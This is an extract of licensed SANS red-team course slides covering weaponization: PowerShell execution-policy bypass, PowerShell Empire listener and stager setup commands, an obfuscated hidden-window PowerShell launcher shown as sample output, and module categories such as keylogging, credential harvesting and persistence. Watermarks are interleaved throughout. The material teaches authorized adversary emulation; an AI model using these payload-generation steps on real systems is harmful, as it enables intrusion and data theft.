To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

123

© SANS Institute 2020 Weaponization

090aff33bcb6e401ded410120bc9a268 Coupling a remote access method into a deliverable payload 26 ,2 02 0

• Part of Red Team Planning and Preparation • Involves having attack infrastructure setup with Command and Control (C2) channels • Red Team must create the payload, test it, and identify IoCs • May involve exploits (but not required)

o.

co

m

>

Ap ril

[email protected]

SEC564 | Red Team Exercises and Adversary Emulation

124

ak

er

@ ya

ho

22829180 i< an

nm

Weaponization Weaponization is the coupling of a remote access method into a deliverable payload. An example would be a PDF or Microsoft Office documents as the weaponized deliverable for the malicious payload. This is a step performed by the Red Team as preparation for the attack. The Blue Team will generally not be able to defend against this step as it occurs on Red Team systems. Weaponization goes hand in hand with attack infrastructure setup as well. The payload created must be configured to connect back via the command and control channels setup for the attack.

M

az

ze

Lincoln Mazzei nc o

ln

In an Adversary Emulation Red Team Exercise, the Red Team needs to create the payloads for the attack infrastructure, ensure the Command and Control channels work, and identify the IoCs that will be left behind. Red Team may choose to leverage exploits or leverage social engineering to obtain access to credentials or the target environment.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

Reference: https://github.com/infosecn1nja/Red-Teaming-Toolkit#weaponization

live

124

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1064

Blend In

TM

090aff33bcb6e401ded410120bc9a268 WSH The Windows Script Host is a Windows native engine implemented in cscript.exe and wscript.exe. It is responsible for native execution of a wide variety of scripts (including .js, .vbs, .vbe)

26 ,2 02 0

An HTML Application (HTA) is a Windows program of which the source code consists of (dynamic) HTML and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript

HTA

[email protected]

Visual Basic for Applications (VBA) is similar to VBScript (.vbs) described above, yet it is much more powerful! It is typically found in MS Office!

PS1>

PowerShell is the latest, object-oriented scripting technology from Microsoft, implemented in Windows

o.

co

m

>

Ap ril

VBA

SEC564 | Red Team Exercises and Adversary Emulation

125

ak

er

@ ya

ho

22829180 i< an

nm

Blend In Most organizations asking for a Red Team Exercise or Adversary Emulation most likely have controls around blocking standard Windows executables (*.exe). Therefore, we will rely on other built-in Windows scripting technology to execute our payload. An exhaustive discussion of all scripting technology used in Windows is outside of the scope of this course. Due to the many scripting technologies available in Windows, an exhaustive list would take weeks to discuss. We decided to focus on three scripting technologies popular with adversaries: Visual Basic, JavaScript and PowerShell.

M

az

ze

Lincoln Mazzei nc o

ln

Visual Basic BASIC (Beginner’s All-purpose Symbolic Instruction Code) is an older programming language created in 1964. Microsoft’s implementation for Windows, Visual Basic, was created in 1991. The scripting technology we are discussing is VBScript and VBA. VBScript can be executed by the VBScript engine on Windows or by the VBScript engine implemented in applications like Internet Explorer. The VBScript engine generally has the same rights as the user, while in applications like Internet Explorer; it is restricted in its interaction with the operating system’s resources like files and registry values. VBA is executed by the VBA engine implemented in applications like Microsoft Word, Excel, PowerPoint, etc.

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

JavaScript When we talk about JavaScript on Windows, we actually mean JScript: Microsoft’s implementation of ECMAScript. ECMAScript is JavaScript standardized by ECMA (European Computer Manufacturers Association). Like VBScript, JScript can be executed by standalone engines on Windows or by engines implemented in Internet Explorer or Edge.

live

HTA An HTML Application (HTA) is a Windows program of which the source code consists of (dynamic) HTML and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript.

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

125

© SANS Institute 2020 PowerShell PowerShell is Microsoft's latest scripting technology leveraging the object-oriented .NET technology. First introduced in 2006, it was made available as an installation package for Windows XP and Windows Vista. PowerShell version 2.0 was integrated with Windows 7, and since then, all new Windows releases integrate PowerShell. PowerShell was open-sourced and made available for other operating systems than Windows in 2016.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

References: https://attack.mitre.org/techniques/T1064/ https://redcanary.com/blog/adversaries-use-scripting-more-than-any-attck-technique-except-powershell/

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

126

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1086

Introduction to PowerShell

TM

090aff33bcb6e401ded410120bc9a268 PowerShell is Microsoft’s object-oriented scripting language. It supports the .NET framework

26 ,2 02 0

It is a powerful language that can interface with older technologies like the Windows API and ActiveX, and with new technologies like .NET

PS1> [email protected] m

>

Ap ril

Microsoft learned from its security mistakes with older scripting languages and has taken steps to try to prevent abuse by PowerShell scripts

o.

co

PowerShell offers a number of highly interesting features both to the Red and Blue Teams SEC564 | Red Team Exercises and Adversary Emulation

127

ak

er

@ ya

ho

22829180 i< an

nm

Introduction to PowerShell PowerShell was introduced in 2006 as a new object-oriented scripting language. The first version (1.0) had to be installed on Windows operating systems like Windows XP, but since Windows 7.0, PowerShell (version 2.0 and later) is integrated into the Windows operating system. At the time of writing, the latest version of PowerShell is 7.0. In 2016, PowerShell was released as open source software, opening the path to cross-platform versions of PowerShell. PowerShell is built on .NET technology, and thus supports the .NET framework for scripting. But it can also use older Microsoft technology like ActiveX and the Windows API. This means that very powerful scripts can be written by adversaries to attack enterprise machines. Scripts can be developed that operate completely in memory, avoiding detection and monitoring. PowerSploit is one example of a red team PowerShell framework.

nc o

ln

M

az

ze

Lincoln Mazzei

With the introduction of PowerShell, Microsoft took some design decisions to improve security and avoid abuse of this new scripting capability, as witnessed in the past with VBS, VBA, and JS. PowerShell offers a number of highly interesting features for Red Teams.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

References: https://attack.mitre.org/techniques/T1086/ https://redcanary.com/blog/getting-started-with-attck-new-report-suggests-prioritizing-powershell/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

127

© SANS Institute 2020 Opening PowerShell Scripts

090aff33bcb6e401ded410120bc9a268 Extension PowerShell scripts are stored as text files with extension ps1

26 ,2 02 0

Editing scripts When a .ps1 is opened (for example doubleclicked), by default Notepad is launched to edit the content of the .ps1 file.

Ap ril

[email protected] co o.

The execution of .ps1 files is governed by an execution policy. By default, the execution policy is set to “Restricted” and .ps1 files cannot be executed when they are loaded into the PowerShell shell. This is not considered a security feature but more of a safety net!

m

>

Restricted execution

SEC564 | Red Team Exercises and Adversary Emulation

128

ak

er

@ ya

ho

22829180

The PowerShell script is not executed.

i< an

nm

Opening PowerShell Scripts PowerShell scripts are contained in text files with extension .ps1. To avoid abuse similar to the Windows Script Host, where .vbs, .js scripts can be executed just by double-clicking, the .ps1 extension is associated with notepad. When a file with extension .ps1 is opened in Windows Explorer (for example by double-clicking the icon that represents the file), notepad.exe is launched to edit the file. This prevents attacks similar to emailing malicious .vbs or .js files.

az

ze

Lincoln Mazzei nc o

ln

M

The execution of .ps1 files is governed by an execution policy. By default, the execution policy is set to Restricted, and .ps1 files cannot be executed when they are loaded into the PowerShell shell. However, it’s important to understand that the setting was never meant to be a security control. Instead, it was intended to prevent administrators from shooting themselves in the foot.

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ce

ns

ed

To :

Microsoft took these security design decisions and implemented these restrictions to limit the abuse of PowerShell scripts. As was to be expected, malicious actors found other ways to abuse PowerShell and it has become a very powerful tool used by adversaries and Red Teams. The fact that it is integrated into Windows makes PowerShell as the go-to exploitation and post-exploitation tool.

Li

Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/setexecutionpolicy?view=powershell-6

live

128

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Bypassing the ExecutionPolicy

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Execution is disabled The script cannot be launched via a powershell.exe argument due to the ExecutionPolicy

[email protected] o.

co

m

>

Ap ril

Policy bypass Temporarily bypassing the execution policy allows the execution of scripts in .ps1 files.

SEC564 | Red Team Exercises and Adversary Emulation

129

ak

er

@ ya

ho

22829180 i< an

nm

Bypassing the ExecutionPolicy PowerShell scripts contained in .ps1 files cannot be executed by simply invoking the powershell.exe shell and passing the script file as an argument (-File test.ps1). This will not be allowed by the default execution policy. The default PowerShell execution policy is set to Restricted, prohibiting the execution of .ps1 files passed as arguments. The same happens inside the PowerShell shell when a .ps1 file is loaded, for example, .\test.ps1. The execution policy will prevent the test.ps1 script from executing. The PowerShell execution policy can be checked by using the Get-ExecutionPolicy cmdlet: This will return the value Restricted.

M

az

ze

Lincoln Mazzei nc o

ln

It is possible to bypass the PowerShell execution policy by using option –ExecutionPolicy when starting the PowerShell shell (powershell.exe). If this option is given the value Bypass, the execution policy will be bypassed and the script inside the .ps1 file will execute. A scenario where attackers email users a .ps1 file and then instruct the user to save the file to disk, open a command-line to launch PowerShell with the execution policy bypass argument to execute the saved .ps1 file is very unlikely. Using .ps1 files as the initial delivery vector is virtually non-existent, as PowerShell is configured by default to prevent the execution of .ps1 files. However, PowerShell is often used in blended attacks, for example, with a malicious Office document (VBA code) or malicious JScript files. In these blended attacks, VBA, VBS or JS is just used to start PowerShell and execute malicious scripts.

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

Reference: https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

129

© SANS Institute 2020 Introducing Empire

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Empire is feature-rich post-exploitation framework based primarily on PowerShell. Consists of controlling framework (with listeners) written in Python. Agents (clients) for Windows (using a pure PowerShell 2.0 agent) and Linux/OSX support (using a pure Python 2.6/2.7 agent). Result of combining multiple PowerShell projects!



Automatically configure agents, ready for deployment and callback

• • •

C2 via HTTP or HTTPS (proxy aware) as Beacons Cryptographically secure communication between the agent and listener The agent itself is lightweight, which supports rapid deployment of postexploitation modules, with a variety of module types: PowerSploit, PowerBreach, PowerUp, PowerView

o.

co

m

>

Ap ril

[email protected]

SEC564 | Red Team Exercises and Adversary Emulation

130

ak

er

@ ya

ho

22829180 i< an

nm

Introducing Empire As PowerShell comes standard in all supported Windows operating systems, security researchers have released several toolsets that leverage PowerShell in an offensive role, including PowerSploit, Posh-SecMod, Unmanaged-PowerShell, and PowerShell-AD-Recon. Each tool offered useful functionality, but before PowerShell Empire, they weren't consistent or interoperable with each other. Empire changed all that. Will Schroeder, Justin Warner, and Matt Nelson built Empire to combine the features of those PowerShell attack tools into a single modular framework. The result is a feature-rich post-exploitation framework, all based on PowerShell running on target machines.

M

az

ze

Lincoln Mazzei nc o

ln

Empire consists of two primary parts: A controlling server (written in Python) and agent clients (written in PowerShell for Windows and Python for Linux/OSX). The agents are extremely modular with over 100 different modules that can be loaded into them in real time to expand their feature set.

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

Empire automatically configures agents to call back to listeners with a minimal need to fine-tune its settings. Command and Control via HTTP or HTTPS (that is proxy aware) as Beacons: All agent-to-listener communication occurs via a reverse HTTP or HTTPS connection, which is also proxy aware. You can even configure an agent with proxy credentials (userID and password) if it has to go through an authenticated proxy on its way out to the internet. Red Team configures the beacon which allows the agent to call out every so often instead of attacker coming inbound. Cryptographically secure communication between the agent and listener: Empire was designed to be operationally secure, in that you can establish specific long-term session keys for establishing a communication channel between agents and listeners. This cryptographic communication prevents someone from determining the commands and responses you issue to and from agents and, even more importantly, prevents someone on the network from hijacking your agents on compromised machines. The agent itself is lightweight, which supports rapid deployment of post-exploitation modules, with a variety of module types: PowerSploit, PowerBreach, PowerUp, PowerView: Empire is highly modular with over 100 different modules, each designed for various post-exploitation activities

Li

ce

• •

To :

Top Features





live

References: http://www.powershellempire.com/ 130 https://github.com/EmpireProject/Empire

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 More Empire Features

• Uses PowerShell but doesn’t require powershell.exe (Unmanaged PowerShell) • Set kill dates and working hours on agents • Rename sessions for easier tracking • Reminders for "Not Opsec safe" modules • Includes a database to store credentials • Exit and relaunch right back where you were

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

131

ak

er

@ ya

ho

22829180 i< an

nm

More Empire Features • Uses PowerShell but doesn’t require powershell.exe: While Empire agents can run inside of a PowerShell.exe process, they don't have to. Empire includes the ability to inject agents as a DLL inside of other running processes, pulling in PowerShell features without actually running the PowerShell.exe executable. That way, Empire agents can be stealthier and even run on systems that blacklist PowerShell.exe. • You can also use Empire to set kill dates for agents, after which time the agent will disappear from the target system automatically. You can set working times for the agents so that they will call back only during working hours and go dormant outside of those hours. • Rename your sessions: Empire sessions allow you to assign any alphanumeric name to the session, which makes it a lot easier to differentiate which session is associated with which compromised host. • Reminders for "Not Opsec safe" modules: If you are about to take an action that might generate a log or get noticed by a user or administrator, Empire will warn you that the action you are about to take is "Not Opsec safe." It then verifies that you want to take the action before proceeding. This is a very handy reminder if you are trying to be stealthy. • Includes a database where it stores credentials harvested from target systems. • When you exit Empire, it stores your current state, including information about listeners and agents, so you can start it up again right where you left off.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK References: http://www.powershellempire.com/ https://github.com/EmpireProject/Empire

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

131

© SANS Institute 2020 Empire Operations

090aff33bcb6e401ded410120bc9a268 • Listeners 26 ,2 02 0

Stagers Agents Modules Scripts

[email protected] o.

co

m

>

Ap ril

• • • •

SEC564 | Red Team Exercises and Adversary Emulation

132

ak

er

@ ya

ho

22829180



ze

az

nc o

ln



Lincoln Mazzei

Listeners: This is the first thing you need to set up to use Empire; it is where the command and control servers are configured. Without a listener, you cannot create payloads via stagers or get agents to call into your server. Stagers: Once a listener is running, a stager can be chosen. This is the weaponization phase as Stagers create payloads for listeners. Stagers are stored in ./lib/stagers and are split by osx, windows, and multi (work with Linux, OSX, and/or Windows). Agents: Empire will notify you when an agent checks in. Access the agents menu with agents command. Basic information on active agents should be displayed. Various commands can be executed on specific agent IDs or all from the agent menu—i.e., kill all. To interact with an agent, use interact AGENT_NAME. Agent names should have tab completion available for all commands. Agent names can be renamed with rename command. Modules: Modules are contained in ./lib/modules/*, and a template.py file there shows how to extend your own scripts into Empire. Scripts: PowerShell scripts that are large or used often are stored in ./data/module_source/*

M



i< an

nm

Empire Operations Start Empire from a terminal, go to the /opt/Empire/ directory and launch with ./empire You should see a screen like the one on this slide. Operating Empire is done through the five main operational functions:

ns

ce



Li



ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK References: http://www.powershellempire.com/?page_id=110 https://github.com/EmpireProject/Empire

132

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Empire Listeners •

Normal: http, http_com, dropbox



Pivot: redirector



Hop: http_hop



Foreign: http_foreign, http_mapi, meterpreter, onedrive

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

133

ak

er

@ ya

ho

22829180 i< an

nm

Empire Listeners Listeners is the module where the command and control is set up. The listener command will jump to the listener management menu. Active listeners will be displayed, and the same information can be displayed at any time with the listener command. The uselistener command will select a listener and the info command will display the currently set listener options. To change any options, use the set command followed by the Name and Value. Once all settings are to your liking, the execute command will create the listener. There are four types of listeners:

M

Normal: Agents communicate directly with the Empire server • http • http_com • dropbox Pivot: Pivot listeners will open up a port on an agent’s machine that redirects to an existing listener • redirectory Hop: Utilize a hop.php file hosted on a jump server to relay connections from agents to the Empire server • http_hop Foreign: This is used for session passing between Empire servers • http_foreign • http_mapi • Meterpreter • Onedrive

nc o

ln



az

ze

Lincoln Mazzei

To :

ed

Li

ce



ns



Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK •

Example Setup of HTTP Listener (Empire) > listeners (Empire: listeners) > uselistener http (Empire: listeners/http) > info (Empire: listeners/http) > set StagingKey thisisatest (Empire: listeners/http) > execute (Empire: listeners/http) > back

live

Reference: http://www.powershellempire.com/?page_id=110 © 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

133

© SANS Institute 2020 Empire Stagers

090aff33bcb6e401ded410120bc9a268 Create the payload 26 ,2 02 0

• Windows – C#, bat, SCT, vbs, xml, macro, LNK, HTA, ducky

[email protected]

• OS X

>

Ap ril

– AppleScript, JAR, macro, pkg, teensy, Safari

co

m

• Multi

o.

– Bash, Macro, WAR, pyInstaller

SEC564 | Red Team Exercises and Adversary Emulation

134

ak

er

@ ya

ho

22829180 i< an

nm

Empire Stagers Stagers is where you will perform the “weaponization” process to create your payload based on the chosen listener (command and control). Empire implements various stagers in a modular format in ./lib/stagers/*. These include dlls, macros, one-liners, and more. To use a stager, from the main, listeners, or agents menu, use usestager to tabcomplete the set of available stagers, and you’ll be taken to the individual stager’s menu. The UI here functions similarly to the post module menu, i.e., set/unset/info and generate to generate the particular output code.

az

ze

Lincoln Mazzei

• • • •

nc o

ln

M

Stagers are classified by operating system as Windows, OSX, and Multi (which means they work on multiple operating systems). Here are the most common: Launcher: Probably the most used stager module; generates a one-liner launcher for an Empire agent. Launcher BAT: Generates a self-deleting .BAT file that executes a one-liner launcher for an Empire agent. Launcher VBS: Generates a .VBS file that executes a one-liner launcher for an Empire agent. Macro: Generates an office macro that launches an Empire stager. This macro can be embedded into any office document for the purposes of phishing. DLL: Generates a reflectively-injectable .DLL that loads up the .NET runtime into a process and execute a download-cradle to stage an Empire agent. Ducky: Generates a Rubber Ducky script that launches an Empire stager. bash.py: Generates self-deleting Bash script to execute the Empire launcher. pyinstaller.py: Generates an ELF binary payload launcher for Empire using pyInstaller. war.py: Creates a war file to deploy in application servers such as Apache Tomcat, JBoss, or Oracle Weblogic Servers.

To :

ed

ns

ce

• • • •

Li



Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

Example Setup of Stager (Empire: listeners) > usestager multi/launcher (Empire: stager/windows/macro) > set Listener http (Empire: stager/windows/macro) > generate References: http://www.powershellempire.com/?page_id=147 http://www.powershellempire.com/?page_id=104 134

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Empire Payload

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

135

ak

er

@ ya

ho

22829180 i< an

nm

Empire Payload Like VBScript and Jscript, adversaries can obfuscate and encode PowerShell scripts to bypass detection software like antivirus and IDS/IPS. Empire can do this through set Obfuscate True and set Base64 true. The slide shows base64 encoded and non-base64 encoded. Below, one can see what obfuscation does. All of this is for defense evasion and will be covered tomorrow.

az

ze

Lincoln Mazzei nc o

ln

M

(Empire: stager/multi/launcher) > set Base64 false (Empire: stager/multi/launcher) > set Obfuscate True (Empire: stager/multi/launcher) > generate c:\WiNDoWs\sysTEm32\cmd.ExE /C "SeT HaJ= ^&("{0}{1}"-f 's','ET') ('3V'+'m’) … ^| POweRSHElL -WIN hidDeN -NOEXI -NoNINtERaC -noPRo -EXeCUTIoNp bYPaSS - && c:\WiNDoWs\sysTEm32\cmd.ExE /C%oTw%"

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

135

© SANS Institute 2020 Empire Agents

090aff33bcb6e401ded410120bc9a268 With the payload created, the Red Team must deliver it and get it executed on the host to get an agent registered in Empire. We will cover this shortly!



List agents: list



Rename agents: rename



Interact with agents: interact

26 ,2 02 0



o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

136

ak

er

@ ya

ho

22829180 i< an

nm

Empire Agents You will see a status message when an agent checks in (i.e. [+] Initial agent from now active). Get to the Agents menu with agents. Basic information on active agents should be displayed. Various commands can be executed on specific agent IDs or all from the agent menu, i.e. kill all. Rename the agent to something easier to remember or identify with the command rename To interact with an agent, use interact AGENT_NAME. Agent names should be tab-completable for all commands. In an Agent menu, info will display more detailed agent information, and help will display all agent commands. If a typed command isn’t resolved, Empire will try to interpret it as a shell command (like ps). You can also cd directories and upload/download files.

nc o

ln

M

az

ze

Lincoln Mazzei

Reference: http://www.powershellempire.com/?page_id=106

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

136

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Empire Modules and Scripts

090aff33bcb6e401ded410120bc9a268 PowerBreach: Persistence mechanisms Posh-SecMod: Discovery, network situational awareness, etc. PowerSploit: Code execution, screenshots, keystroke logging, and more PowerUp: Local privilege escalation PowerView: Account into, domain info, shares, etc.

[email protected] o.

co

m

>

Ap ril

– – – – –

26 ,2 02 0

Once the initial agent is deployed on a target, its features can be extended using PowerShell Empire modules



SEC564 | Red Team Exercises and Adversary Emulation

137

ak

er

@ ya

ho

22829180 i< an

nm

Empire Modules and Scripts Once an Empire agent is deployed on a target and it communicates back with a listener, you can then extend its features through over 100 different modules included with Empire. Empire includes modules from tools such as PowerBreach (which provides persistence mechanisms), Posh-SecMod (which includes a variety of target discovery and scanning features), PowerSploit (which gives code execution, screenshots, keystroke logging, and more), PowerUp (a great set of local privilege escalation attacks), and PowerView (which harvests account and domain information from a compromised machine). Most of these individual features are PowerShell scripts in the form of .ps1 script files that come with Empire itself.

ln

M

az

ze

Lincoln Mazzei nc o

To see available modules, type usemodule . The info command will display all current module options. To set an option, use set . Then execute will task the agent to execute the module and back will return you to the agent’s main menu. Results will be displayed as they come back.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK • • • •

ns

ce



Code Execution modules can inject an Empire agent into other running processes on the machine by using a variety of different mechanisms, such as DLL injection. Collection modules pillage the target machine for useful information, including grabbing browser data, getting clipboard contents, capturing keystrokes, taking screenshots, and more. Exfiltration modules let you simulate the exfiltration of sensitive data, such as fake PII, to measure whether Data Loss Prevention (DLP) tools and/or a Blue Team can detect the activity. Exploitation modules include exploits for JBoss middleware software as well as the Jenkins Script Console interpreter. Fun modules allow a pen tester to pester a user sitting at the compromised computer, playing audio files, popping up a dialog box with text of the attacker's choosing, changing desktop wallpaper, and activating the Windows speech synthesizer to make the computer talk to the user. Lateral Movement modules let the pen tester move to another target using techniques such as psexec or ssh.

Li



ed

Empire splits them out in categories:

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

137

© SANS Institute 2020 •

Management modules perform various system administration actions on a compromised machine, including having it send email, using RunAs to launch a program, injecting hashes into the Local Security Authority Subsystem Service (LSASS) for pass-the-hash attacks, logging a user off, activating RDP, and altering file system timestamps. Persistence modules provide a way for an agent to survive across a logoff or reboot action by making changes to the various Run Registry keys, logon scripts, system boot programs, the task scheduler, or other Windows features. Recon modules let you find additional targets via network sweeps. Situational Awareness modules include features for scanning the network for additional hosts, ports, shares, and much more. Trollsploit modules are used for trolling the user, including playing Rick Astley's 1987 hit song "Never Gonna Give You Up." These are designed to annoy or surprise the user.



• • •

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 [email protected] co

m

>

Ap ril

In addition to formalized modules, you are able to simply import and use a .ps1 script in your remote empire agent. Use the scriptimport ./path/ command to import the script. The script will be imported and any functions accessible to the script will now be tab completable using the “scriptcmd” command in the agent. This works well for very large scripts with lots of functions that you do not want to break into a module.

o.

Reference: http://www.powershellempire.com/?page_id=110

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

138

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Package and Test

090aff33bcb6e401ded410120bc9a268 • With the payload created, insert it in the respective file for delivery

• Empire is just one example for creating payloads – msfvenom – Unicorn – Many C2 Frameworks do this for you – Many more we will cover in Defense Evasion

26 ,2 02 0

– Unicorn GitHub page is very helpful! Thanks, Dave Kennedy!

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

139

ak

er

@ ya

ho

22829180 i< an

nm

Package and Test We just covered one example of creating payloads (weaponization) before delivery and obtaining initial access. There are many other methods to create payloads, some we will cover in the Defense Evasion portion of the class tomorrow. With the payload created, it may need to be packaged for delivery. For example, a macro payload needs to be added to an Office document. Unicorn page has detailed information on how to insert payloads into their respective file.

az

ze

Lincoln Mazzei ln

M

Msfvenom: MSFvenom is a combination of Msfpayload and Msfencode for creating payloads for Metasploit.

nc o

Unicorn: Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. Usage is simple, just run Magic Unicorn (ensure Metasploit is installed if using Metasploit methods and in the right path) and Magic Unicorn will automatically generate a PowerShell command that you need to simply cut and paste the PowerShell code into a command line window or through a payload delivery system. Unicorn supports your own shellcode, cobalt strike, and Metasploit.

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

References: https://www.offensive-security.com/metasploit-unleashed/msfvenom/ https://github.com/trustedsec/unicorn

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

139

© SANS Institute 2020 Document Indicators of Compromise (IoCs)

090aff33bcb6e401ded410120bc9a268 Indicators of Compromise (IoCs) are artifacts that identify or 26 ,2 02 0

describe adversary actions

• Control and manage Red Team’s IoCs • May be required for “injects” • Very helpful for deconfliction

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

140

ak

er

@ ya

ho

22829180 i< an

nm

Document Indicators of Compromise (IoCs) Indicators of Compromise (IoCs) are artifacts that identify or describe adversary actions. An IoC is a piece of information that an adversary leaves behind that can be used as an indicator. As was explained during the Threat Intelligence phase, the Pyramid of Pain distinguishes different types of Indicators of Compromise. For each TTP, Red Team must document the IoCs that will be created. These will be used later if Blue Team catches the Red Team for deconfliction or if an inject needs to be used so that Blue Team response can be measured.

az

ze

Lincoln Mazzei nc o

ln

M

Hash Values: SHA1, MD5 or other similar hashes that correspond to specific suspicious or malicious files. IP Addresses: IP Addresses or ranges known to be used by malicious actors. Domain Names: This could be either a domain name itself (e.g., "evil.net") or maybe even a sub- or sub-subdomain (e.g., "this.is.sooooo.evil.net"). Network Artifacts: Observables caused by adversary activities on your network. Host Artifacts: Observables caused by adversary activities on one or more of your hosts. Tools: Software used by the adversary to accomplish their mission. Tactics, Techniques and Procedures (TTPs): How the adversary goes about accomplishing their mission, from reconnaissance all the way through data exfiltration and at every step in between.

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

Reference: https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html

live

140

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 VECTR

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

141

ak

er

@ ya

ho

22829180 i< an

nm

VECTR VECTR is designed to track Red and Blue security teams through comprehensive Adversary Emulations. It allows Red Team to document the attack and gauge the effectiveness of Blue Team. Created by Security Risk Advisors and available to the community, it is one of the best tools to track and visualize the work. VECTR will be covered tomorrow, but it is a great idea to start tracking and reporting early.

az

ze

Lincoln Mazzei nc o

ln

M

This screenshot shows what the Red Team can document for a test case. It includes the test case name, description, phase of ATT&CK, command, status, time attack started and stopped, source and destination IP addresses, attacker tools, target assets, and any other references. Once the attack completes, the Blue Team portion can be analyzed and updated.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

References: https://vectr.io/ https://github.com/SecurityRiskAdvisors/VECTR https://securityriskadvisors.com/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

141

© SANS Institute 2020 Course Roadmap

Delivery

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

142

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

142

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 ATT&CK T1193

Delivery: Email

TM

090aff33bcb6e401ded410120bc9a268 Send your payload as an attachment in an email 26 ,2 02 0

• Self-setup – Gain reputation – Setup DKIM, SPF, PTR record

[email protected] Ap ril

• Third Party

– Instant Reputation

m

>

• Open Relay

o.

co

– Don’t leverage if on internet

